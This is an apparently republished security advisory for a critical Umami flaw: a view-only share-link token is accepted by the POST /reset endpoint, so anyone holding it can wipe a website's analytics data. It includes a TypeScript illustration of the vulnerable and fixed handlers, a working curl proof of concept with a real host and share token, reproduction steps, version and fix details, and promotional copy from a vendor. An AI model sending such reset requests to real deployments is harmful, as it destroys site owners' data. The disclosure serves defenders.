GHSA-8www-cffh-4q98
Severity: CRITICAL
Anyone with a share link can RESET all website data in Umami
Package: umami (npm)
Description
Summary
Anyone with a share link (permissions to view) can reset the website data.
Details
When a user navigates to a /share/ URL, they receive a share token which is then used for authentication. This token is later verified by useAuth. Once the token is verified, the user can call most of the GET APIs that fetch stats about a website.
The POST /reset endpoint is secured using canViewWebsite, which is the wrong check for such a destructive action: the view check is satisfied by a share token, so it is possible to completely reset all website data with only view permissions.
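The authorization gap described above, shown as an added TypeScript illustration that is not Umami's own code: a share token satisfies a view check, so a destructive endpoint gated on that check is reachable by any share-link visitor, while gating it on a mutation check closes the path. The `Auth` shape, the in-memory website store, the `canUpdateWebsite` name and the 401 status are this example's own assumptions.

```typescript
// Added illustration (not Umami's own code): models the authorization gap in
// GHSA-8www-cffh-4q98. The Auth shape, the website store, the name
// `canUpdateWebsite` and the status codes are assumptions of this example.

type Auth = {
  // Present when the request carries a session for a logged-in user.
  user?: { id: string; isAdmin: boolean };
  // Present when the request was authenticated with a share token (what a
  // /share/ visitor receives); it only names the website it exposes.
  shareToken?: { websiteId: string };
};

type Website = { id: string; ownerId: string; data: string[] };

// Constructed sample state: one website owned by user "u-owner" with two events.
const websites = new Map<string, Website>([
  ['site-1', { id: 'site-1', ownerId: 'u-owner', data: ['pageview', 'pageview'] }],
]);

// View permission: admins, the owner, and anyone holding a share token for this
// website. This is the right gate for read-only stats endpoints.
function canViewWebsite(auth: Auth, websiteId: string): boolean {
  if (auth.user?.isAdmin) return true;
  if (auth.shareToken?.websiteId === websiteId) return true;
  const site = websites.get(websiteId);
  return !!site && !!auth.user && site.ownerId === auth.user.id;
}

// Update permission (assumed name): a share token never satisfies it; only the
// owner or an admin may mutate the website.
function canUpdateWebsite(auth: Auth, websiteId: string): boolean {
  if (auth.user?.isAdmin) return true;
  const site = websites.get(websiteId);
  return !!site && !!auth.user && site.ownerId === auth.user.id;
}

// The destructive operation itself: drops all collected data for a website.
function resetData(websiteId: string): void {
  const site = websites.get(websiteId);
  if (site) site.data = [];
}

// Vulnerable shape: the destructive endpoint is gated on the view check, so a
// share-token-only caller passes and the data is wiped.
function resetHandlerVulnerable(auth: Auth, websiteId: string): number {
  if (!canViewWebsite(auth, websiteId)) return 401;
  resetData(websiteId);
  return 200;
}

// Hardened shape: the destructive endpoint is gated on the update check, so a
// share-token-only caller is rejected before anything is touched.
function resetHandlerFixed(auth: Auth, websiteId: string): number {
  if (!canUpdateWebsite(auth, websiteId)) return 401;
  resetData(websiteId);
  return 200;
}

// Helpers so the effect of each handler can be observed.
function websiteEventCount(websiteId: string): number {
  return websites.get(websiteId)?.data.length ?? 0;
}

function seedWebsite(websiteId: string, ownerId: string, events: number): void {
  websites.set(websiteId, { id: websiteId, ownerId, data: Array(events).fill('pageview') });
}

// Stand-alone run: a caller holding only a share token for site-1.
const shareOnlyCaller: Auth = { shareToken: { websiteId: 'site-1' } };
console.log('fixed handler, share token only:', resetHandlerFixed(shareOnlyCaller, 'site-1'));
console.log('events after fixed handler:', websiteEventCount('site-1'));
console.log('vulnerable handler, share token only:', resetHandlerVulnerable(shareOnlyCaller, 'site-1'));
console.log('events after vulnerable handler:', websiteEventCount('site-1'));
```

The point to carry into a review is that the permission check on an endpoint must match the verb it performs: a "can view" predicate that accepts share tokens is fine for GET stats routes and wrong for anything that writes or deletes.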
PoC
```bash
curl -X POST 'https://analytics.umami.is/api/websites/b8250618-ccb5-47fb-8350-31c96169a198/reset' \
  -H 'authority: analytics.umami.is' \
  -H 'accept: application/json' \
  -H 'accept-language: en-US,en;q=0.9' \
  -H 'authorization: Bearer undefined' \
  -H 'cache-control: no-cache' \
  -H 'content-type: application/json' \
  -H 'pragma: no-cache' \
  -H 'referer: https://analytics.umami.is/share/bw6MFhkwpwEXFsbd/test' \
  -H 'sec-ch-ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "Linux"' \
  -H 'sec-fetch-dest: empty' \
  -H 'sec-fetch-mode: cors' \
  -H 'sec-fetch-site: same-origin' \
  -H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36' \
  -H 'x-umami-share-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ3ZWJzaXRlSWQiOiJiODI1MDYxOC1jY2I1LTQ3ZmItODM1MC0zMWM5NjE2OWExOTgiLCJpYXQiOjE2OTAzNjkxOTl9.zTfwFrfggE5na7rOOgkUobEBm48AH_8WVyh2RgJGzcw' \
  --compressed
```
You can reproduce this by:
- Accessing a website using its share link
- Copying the `token` received from the `GET /share/{website-id}` response
- Sending a POST request to `https://analytics.umami.is/api/websites/b8250618-ccb5-47fb-8350-31c96169a198/reset` with the `x-umami-share-token:` header set to the token copied in the previous step
- The website data is now cleared
Impact
Every Umami deployment with a share link exposed to the internet is affected.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| npm | umami | all versions before 2.3.1 | 2.3.1 |
Detection & mitigation playbook
Open-source dependency
Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for umami. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update umami to 2.3.1 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-8www-cffh-4q98 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-8www-cffh-4q98 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-8www-cffh-4q98. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-8www-cffh-4q98 in your dependencies?
O3 detects GHSA-8www-cffh-4q98 across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.